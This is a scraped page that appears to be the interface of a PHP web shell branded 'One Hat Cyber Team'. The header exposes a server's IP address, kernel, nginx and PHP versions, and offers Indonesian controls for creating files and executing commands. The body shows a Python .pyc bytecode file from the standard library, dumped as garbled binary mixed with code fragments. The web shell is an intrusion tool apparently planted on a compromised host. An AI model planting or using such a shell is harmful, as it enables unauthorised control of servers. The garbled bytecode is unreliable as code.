⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.10
/
importlib
/
metadata
/
__pycache__
/
View File Name :
_collections.cpython-310.pyc
o }ò5hç ã @ s6 d dl Z G dd„ de jƒZG dd„ de dd¡ƒZdS )é Nc s( e Zd ZdZ‡ fdd„Zdd„ Z‡ ZS )ÚFreezableDefaultDicta! Often it is desirable to prevent the mutation of a default dict after its initial construction, such as to prevent mutation during iteration. >>> dd = FreezableDefaultDict(list) >>> dd[0].append('1') >>> dd.freeze() >>> dd[1] [] >>> len(dd) 1 c s t | dtƒ jƒ|ƒS )NÚ_frozen)ÚgetattrÚsuperÚ__missing__)ÚselfÚkey©Ú __class__© ú6/usr/lib/python3.10/importlib/metadata/_collections.pyr s z FreezableDefaultDict.__missing__c s ‡ fdd„ˆ _ d S )Nc s ˆ ¡ S )N)Údefault_factory)r ©r r r Ú
s z-FreezableDefaultDict.freeze.
.
)r r r r r Úfreeze s zFreezableDefaultDict.freeze)Ú__name__Ú __module__Ú__qualname__Ú__doc__r r Ú __classcell__r r r r r s r c @ s e Zd Zedd„ ƒZdS )ÚPairc C s | t tj| dd¡ƒŽ S )Nú=é )ÚmapÚstrÚstripÚsplit)ÚclsÚtextr r r Úparse s z Pair.parseN)r r r Úclassmethodr r r r r r s r z name value)ÚcollectionsÚdefaultdictr Ú namedtupler r r r r Ú
s